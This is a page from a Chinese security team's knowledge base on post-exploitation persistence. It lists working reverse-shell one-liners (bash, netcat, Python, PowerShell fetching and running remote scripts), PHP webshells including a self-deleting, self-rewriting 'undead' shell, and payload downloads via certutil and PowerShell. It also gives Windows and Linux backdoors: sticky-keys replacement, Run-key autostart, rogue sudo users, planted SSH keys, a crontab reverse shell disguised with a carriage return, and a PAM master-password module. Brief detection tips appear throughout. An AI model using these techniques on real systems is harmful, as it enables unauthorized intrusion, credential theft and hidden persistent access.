<!DOCTYPE html>
<html lang="en-US">
  <head>
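    <meta charset="utf-8">
    <!-- Viewport no longer sets user-scalable=no / maximum-scale=1: those block pinch-zoom (WCAG 1.4.4 fail) -->
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>权限维持 | 狼组安全团队公开知识库</title>
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <!-- type attribute dropped: text/javascript is the default -->
    <script src="/assets/js/push.js"></script>
    <!-- Only one description: the empty page-level copy that preceded the generator tag was removed so it cannot shadow this one -->
    <meta name="description" content="致力于打造信息安全乌托邦">
    <!-- "no-referrer" is the standard token; "never" is its legacy spelling with the same effect -->
    <meta name="referrer" content="no-referrer">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">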
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/54.d132c2f8.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" 
href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" 
href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
class="sidebar-link">【防守方】Webshell排查</a></li><li><a href="/knowledge/hw/purple-team.html" title="【裁判方】紫队视角看2020年络网络攻防实战演习" class="sidebar-link">【裁判方】紫队视角看2020年络网络攻防实战演习</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h2 id="反弹shell">反弹Shell <a href="#反弹shell" class="header-anchor">#</a></h2> <p><strong>攻击者VPS监听</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">nc</span> -lvp <span class="token number">9999</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>BASH</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>/bin/bash -i <span class="token operator">&amp;&gt;</span> /dev/tcp/192.168.0.198/9999 <span class="token operator">&lt;</span><span class="token file-descriptor important">&amp;1</span>

/bin/sh -i <span class="token operator">&amp;&gt;</span> /dev/tcp/192.168.0.198/9999 <span class="token operator">&lt;</span><span class="token file-descriptor important">&amp;1</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><strong>Netcat</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">nc</span> -e /bin/bash <span class="token number">192.168</span>.0.198 <span class="token number">9999</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>PowerShell</strong></p> <p>将ps1脚本先放到VPS上</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token comment">##TCP</span>
powershell <span class="token function">IEX</span> <span class="token punctuation">(</span><span class="token function">New-Object</span> Net<span class="token punctuation">.</span>WebClient<span class="token punctuation">)</span><span class="token punctuation">.</span>DownloadString<span class="token punctuation">(</span><span class="token string">'https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">Invoke-PowerShellTcp</span> <span class="token operator">-</span>Reverse <span class="token operator">-</span>IPAddress 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>0<span class="token punctuation">.</span>198 <span class="token operator">-</span>port 9999

<span class="token comment">##UDP</span>
powershell <span class="token function">IEX</span> <span class="token punctuation">(</span><span class="token function">New-Object</span> Net<span class="token punctuation">.</span>WebClient<span class="token punctuation">)</span><span class="token punctuation">.</span>DownloadString<span class="token punctuation">(</span><span class="token string">'http://192.168.159.134/nishang/Shells/Invoke-PowerShellUdp.ps1'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">Invoke-PowerShellUdp</span> <span class="token operator">-</span>Reverse <span class="token operator">-</span>IPAddress 10<span class="token punctuation">.</span>1<span class="token punctuation">.</span>1<span class="token punctuation">.</span>1 <span class="token operator">-</span>port 53

<span class="token comment">##ICMP</span>
powershell <span class="token function">IEX</span> <span class="token punctuation">(</span><span class="token function">New-Object</span> Net<span class="token punctuation">.</span>WebClient<span class="token punctuation">)</span><span class="token punctuation">.</span>DownloadString<span class="token punctuation">(</span><span class="token string">'http://192.168.159.134/nishang/Shells/Invoke-PowerShellIcmp.ps1'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">Invoke-PowerShellIcmp</span> <span class="token operator">-</span>IPAddress 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>159<span class="token punctuation">.</span>134
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><strong>Python</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>python -c <span class="token string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect<span class="token variable"><span class="token punctuation">((</span>&quot;<span class="token number">10.1</span><span class="token number">.1</span><span class="token number">.1</span>&quot;<span class="token punctuation">,</span><span class="token number">9999</span><span class="token punctuation">))</span></span>;os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>PHP</strong></p> <p>https://github.com/pentestmonkey/php-reverse-shell</p> <p>PHP 交互式反弹Shell，修改反弹IP后上传到目标访问一下即可。</p> <h2 id="获取webshell">获取Webshell <a href="#获取webshell" class="header-anchor">#</a></h2> <p><strong>隐藏WebShell</strong></p> <blockquote><p>1、仿照已存在的文件起名字，隐藏在深层目录， 创建…目录隐藏shell
2、利用静态文件，比如图片马然后利用 .htaccess 进行解析
3、修改WebShell时间戳为同目录下其它文件相同的时间</p></blockquote> <p><strong>快速应用</strong></p> <p>直接上冰蝎加密shell，或哥斯拉内存马（基于tomcat）
冰蝎：https://github.com/rebeyond/Behinder
哥斯拉：https://github.com/BeichenDream/Godzilla</p> <p><strong>PHP-Webshell</strong></p> <p>文件免杀（Apache、Nginx特性）cmd</p> <div class="language-php line-numbers-mode"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?</span> <span class="token function">assert</span><span class="token punctuation">(</span><span class="token function">implode</span><span class="token punctuation">(</span><span class="token function">reset</span><span class="token punctuation">(</span><span class="token function">get_defined_vars</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	<span class="token comment">//返回由所有已定义变量所组成的数组 </span>

<span class="token keyword">Use</span> age：cmd<span class="token punctuation">.</span>php<span class="token operator">?</span>a<span class="token operator">=</span><span class="token function">system</span><span class="token punctuation">(</span>whoami<span class="token punctuation">)</span><span class="token punctuation">;</span>

适用于<span class="token constant">PHP</span> <span class="token operator">&lt;</span> <span class="token number">7.1</span> ，因为在<span class="token constant">PHP7</span><span class="token punctuation">.</span><span class="token number">1</span>之后assert被弃用了、<span class="token number">7.2</span> create_function被弃用了
</span></code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>内存马</strong></p> <div class="language-php line-numbers-mode"><pre class="language-php"><code>//nodie_shell.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
	<span class="token function">set_time_limit</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>			<span class="token comment">//设置脚本最大执行时间,0 即为无时间限制</span>
	<span class="token function">ignore_user_abort</span><span class="token punctuation">(</span><span class="token boolean constant">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	<span class="token comment">//设置与客户机断开不终止脚本的执行</span>
	<span class="token function">unlink</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>			<span class="token comment">//删除文件自身</span>
	<span class="token variable">$file</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'/var/www/html/.shell.php'</span><span class="token punctuation">;</span>	
	<span class="token variable">$code</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'&lt;?php if(md5($_POST[&quot;pass&quot;])==&quot;cdd7b7420654eb16c1e1b748d5b7c5b8&quot;){@system($_POST[a]);}?&gt;'</span><span class="token punctuation">;</span>
	<span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
		<span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span> <span class="token variable">$code</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	<span class="token comment">//写shell文件</span>
		<span class="token function">system</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'touch -m -d &quot;2014-10-31 13:50:11&quot; .shell.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>		<span class="token comment">//修改时间戳</span>
		<span class="token function">usleep</span><span class="token punctuation">(</span><span class="token number">1000</span><span class="token punctuation">)</span><span class="token punctuation">;</span>			<span class="token comment">//以指定的微秒数延缓程序的执行</span>
	<span class="token punctuation">}</span>
<span class="token delimiter important">?&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p><strong>杀死PHP不死马</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token number">1</span>、高权限，重启服务
<span class="token function">service</span> apache2 restart
<span class="token function">service</span> php restart

<span class="token number">2</span>、低权限，杀掉所有进程
<span class="token function">kill</span> -9 -1
<span class="token function">killall</span> apache2
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><hr> <h2 id="文件传输">文件传输 <a href="#文件传输" class="header-anchor">#</a></h2> <p><strong>Python搭建简单的HTTP服务</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>python -m http.server <span class="token number">80</span>

python2 -m SimpleHTTPServer <span class="token number">80</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><strong>SCP</strong></p> <p>上传</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">scp</span> <span class="token number">123</span>.txt root@10.10.10.10:~/123.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>下载</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">scp</span> root@210.210.210.10:/home/root/1.txt ./1.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>Bash Download</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#服务器监听</span>
<span class="token function">nc</span> -lp <span class="token number">1337</span> <span class="token operator">&lt;</span> <span class="token number">666</span>.txt

<span class="token comment">#客户端下载</span>
<span class="token function">bash</span> -c <span class="token string">'cat &lt; /dev/tcp/10.10.10.10/1337 &gt; 666.txt'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>certutil 下载</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>certutil -urlcache -split -f http://10.10.10.10:80/npc.exe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>PowerShell 下载</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>powershell <span class="token punctuation">(</span>new-object System.Net.WebClient<span class="token punctuation">)</span>.DownloadFile<span class="token punctuation">(</span><span class="token string">'http://192.168.174.1:1234/evil.txt'</span>,<span class="token string">'evil.exe'</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>Windows查找文件</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">dir</span> /s *.jsp
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token keyword">for</span> /r D:<span class="token punctuation">\</span>developer %i <span class="token keyword">in</span> <span class="token punctuation">(</span>*.jspx<span class="token punctuation">)</span> <span class="token keyword">do</span> @echo %i
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><hr> <h2 id="系统后门">系统后门 <a href="#系统后门" class="header-anchor">#</a></h2> <h3 id="windows">Windows <a href="#windows" class="header-anchor">#</a></h3> <p><strong>Schtasks后门</strong></p> <p>Schtasks.exe能够在本地或远程计算机上创建，删除，查询，更改，运行和结束计划任务</p> <p>不带参数运行Schtasks.exe会显示每个已注册任务的状态和下一次运行时间。</p> <p><strong>wmi后门</strong></p> <p>WMI后门使用了WMI的两个特征：<strong>无文件</strong>和<strong>无进程</strong>（需要管理员权限运行）。</p> <p><strong>原理是</strong>：将代码加密存储于WMI中，即无文件（但代码仍持久保存在WMI仓库中，可被枚举检查）；调用PowerShell执行后门程序，执行后进程消失，即无进程。</p> <p><strong>在Empire中使用Invoke-WMI模块</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>usemodule powershell/persistence/elevated/wmi	<span class="token comment">#设置参数run</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><blockquote><p><strong>检查后门</strong>：使用微软提供的工具<code>Autoruns</code>：</p> <p>https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns</p></blockquote> <p><strong>DLL劫持后门</strong></p> <p>DLL劫持原理就是使用 <code>loadlibrary</code> 动态加载DLL</p> <p>DLL劫持工具：<a href="https://github.com/anhkgg/SuperDllHijack" target="_blank" rel="noopener noreferrer">SuperDllHijack<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><strong>映像劫持shift后门</strong></p> <p><strong>替换sethc.exe为cmd.exe</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>CD C:<span class="token punctuation">\</span>windows<span class="token punctuation">\</span>system32
cacls sethc.exe /t /e /G Administrators:f
cacls cmd.exe /t /e /G Administrators:f
ren sethc.exe aaa.exeren cmd.exe sethc.exe

<span class="token comment">#恢复</span>
ren sethc.exe cmd.exe
ren aaa.exe sethc.exe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>之后连按5下Shift（包括在登录界面）即可弹出cmd窗口</p> <blockquote><p><strong>检查后门</strong>：在登录界面连按5下Shift看是否弹出cmd窗口（放大镜<code>magnify.exe</code>、讲述人<code>narrator.exe</code>、屏幕键盘<code>osk.exe</code>等辅助程序同理）；同时核对<code>sethc.exe</code>等文件的哈希和数字签名，并检查IFEO键下是否存在指向其它程序的<code>Debugger</code>值。</p></blockquote> <p><strong>木马加入开机启动项（Run键）</strong></p> <p>写入<code>HKCU\...\Run</code>不需要管理员权限，但只在当前用户登录时触发；<code>HKLM</code>下的同名键对所有用户生效，需要管理员权限。Autoruns的Logon标签页会同时列出这两处。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>reg <span class="token function">add</span> HKEY_CURRENT_USER<span class="token punctuation">\</span>SOFTWARE<span class="token punctuation">\</span>Microsoft<span class="token punctuation">\</span>Windows<span class="token punctuation">\</span>CurrentVersion<span class="token punctuation">\</span>Run /v SunRAC /t reg_sz /d <span class="token string">&quot;C:\Users\Public\Downloads\msservice.exe&quot;</span> 
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="linux">Linux <a href="#linux" class="header-anchor">#</a></h3> <p><strong>增加超级用户账号</strong></p> <blockquote><p><strong>如果系统不允许<code>uid=0</code>的用户（<code>root</code>）远程登录，可以添加一个普通用户，并将其加入sudoers</strong></p></blockquote> <p><strong>增加用户</strong>（注意：<code>passwd --stdin</code>只有RHEL/CentOS系支持，Debian/Ubuntu上可改用<code>echo 'phP:@admin.886' | chpasswd</code>；新建账号会写入<code>/etc/passwd</code>、<code>/etc/shadow</code>以及<code>/var/log/secure</code>或<code>auth.log</code>，排查时应核对这些文件中近期新增的账号）</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">useradd</span> phP		
<span class="token builtin class-name">echo</span> @admin.886<span class="token operator">|</span><span class="token function">passwd</span> --stdin phP

<span class="token comment">#添加账户</span>
<span class="token comment">#设置密码(密码符合要密码强度策略)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>修改sudoers赋予sudo权限</strong></p> <p>注意：<code>/etc/sudoers</code>一旦出现语法错误，或权限不是0440（下面<code>chmod +w</code>之后的中间状态就是如此），sudo会整体拒绝工作；更稳妥的做法是用<code>visudo</code>编辑，或在<code>/etc/sudoers.d/</code>下放一个权限为0440的独立文件。排查时<code>/etc/sudoers</code>和<code>/etc/sudoers.d/</code>两处都要检查。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">chmod</span> +w /etc/sudoers    
<span class="token builtin class-name">echo</span> <span class="token string">&quot;phP ALL=(ALL) ALL&quot;</span> <span class="token operator">&gt;&gt;</span> /etc/sudoers	
<span class="token function">chmod</span> -w /etc/sudoers

<span class="token comment">#赋予写入权限</span>
<span class="token comment">#添加sudo用户</span>
<span class="token comment">#撤销写入权限</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>或者还可以修改/etc/passwd文件，把用户uid改为0，该用户即等价于root。排查时用<code>awk -F: '$3==0' /etc/passwd</code>列出所有uid为0的账号，正常情况下只应有root。</p> <p><strong>SSH公钥无密码登录</strong></p> <p>下面的命令顺序应是：先确保<code>~/.ssh</code>目录存在，再写入公钥，最后设置权限。写入时建议用<code>&gt;&gt;</code>追加而不是<code>&gt;</code>覆盖，否则会清掉管理员已有的key，既破坏正常访问又很容易被发现。排查时检查各用户<code>~/.ssh/authorized_keys</code>中不认识的公钥，以及<code>sshd_config</code>里的<code>AuthorizedKeysFile</code>是否被改到别的路径。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>ssh-keygen -t rsa    <span class="token comment">#本机生成rsa公钥</span>

<span class="token comment">#把id_rsa.pub写入服务端的authorized_keys中</span>
<span class="token function">chmod</span> <span class="token number">600</span> ~/.ssh/authorized_keys
<span class="token function">chmod</span> <span class="token number">700</span> ~/.ssh
<span class="token builtin class-name">echo</span> <span class="token string">&quot;id_rsa.pub的内容&quot;</span> <span class="token operator">&gt;</span> ~/.ssh/authorized_keys

<span class="token comment">#没有这个文件的话，就自己创建一个</span>
<span class="token builtin class-name">cd</span> ~/
<span class="token function">mkdir</span> .ssh
<span class="token builtin class-name">cd</span> .ssh
<span class="token function">touch</span> authorized_keys
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br></div></div><p><strong>Crontab定时反弹shell</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token punctuation">(</span>crontab -l<span class="token punctuation">;</span><span class="token builtin class-name">printf</span> <span class="token string">&quot;*/1 * * * * exec 9&lt;&gt; /dev/tcp/攻击者IP/8888;exec 0&lt;&amp;9;exec 1&gt;&amp;9 2&gt;&amp;1;/bin/bash --noprofile -i;<span class="token entity" title="\r">\r</span>no crontab for <span class="token variable"><span class="token variable">`</span><span class="token function">whoami</span><span class="token variable">`</span></span>%100c<span class="token entity" title="\n">\n</span>&quot;</span><span class="token punctuation">)</span><span class="token operator">|</span><span class="token function">crontab</span> -

<span class="token comment">#每分钟执行一次，并且crontab -l看不出来</span>
<span class="token comment">#这种要用crontab -e 进去查看并编辑才能看到</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><blockquote><p><strong>检查后门</strong>：<code>crontab -l</code>的输出其实包含这一行，只是<code>\r</code>让终端用后面的“no crontab for …”和空格把它盖掉了。用<code>crontab -l | cat -A</code>（会显示<code>^M</code>），或直接查看<code>/var/spool/cron/</code>（Debian系为<code>/var/spool/cron/crontabs/</code>）下的用户文件即可看到；同时也要检查<code>/etc/crontab</code>和<code>/etc/cron.d/</code>。</p></blockquote> <p><strong>PAM后门</strong></p> <blockquote><p><strong>PAM（Pluggable Authentication Modules）</strong>是由Sun提出的一种认证机制。</p> <p>它通过提供一些动态链接库和一套统一的API，将系统提供的服务和该服务的认证方式分开</p> <p>使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式，而无需更改服务程序</p> <p>同时也便于向系统中添加新的认证手段</p></blockquote> <p><strong>步骤：</strong></p> <p>1、获取目标系统所使用的PAM版本（如<code>rpm -qa pam</code>），下载对应版本的PAM源码</p> <p>2、解压缩，修改pam_unix_auth.c文件，添加万能密码</p> <p>3、编译PAM</p> <p>4、编译完后的文件在：modules/pam_unix/.libs/pam_unix.so，复制到/lib64/security中替换原文件</p> <p>之后即可用万能密码登录，并且该模块会把登录用的用户名和密码记录到文件中</p> <p><strong>排查PAM后门技巧：</strong></p> <p>1、通过strace跟踪sshd（要附加到sshd主进程的PID，<code>-ff</code>会跟踪其fork出的子进程；后门记录口令时会以写方式打开文件，所以过滤带写标志的open调用）</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ps</span> axu <span class="token operator">|</span> <span class="token function">grep</span> sshd
<span class="token function">strace</span> -o aa -ff -p PID
<span class="token function">grep</span> <span class="token function">open</span> aa* <span class="token operator">|</span> <span class="token function">grep</span> -v -e No -e null -e denied<span class="token operator">|</span> <span class="token function">grep</span> WR
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>2、检查pam_unix.so的修改时间</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">stat</span> /lib/security/pam_unix.so      <span class="token comment">#32位</span>
<span class="token function">stat</span> /lib64/security/pam_unix.so    <span class="token comment">#64位</span>
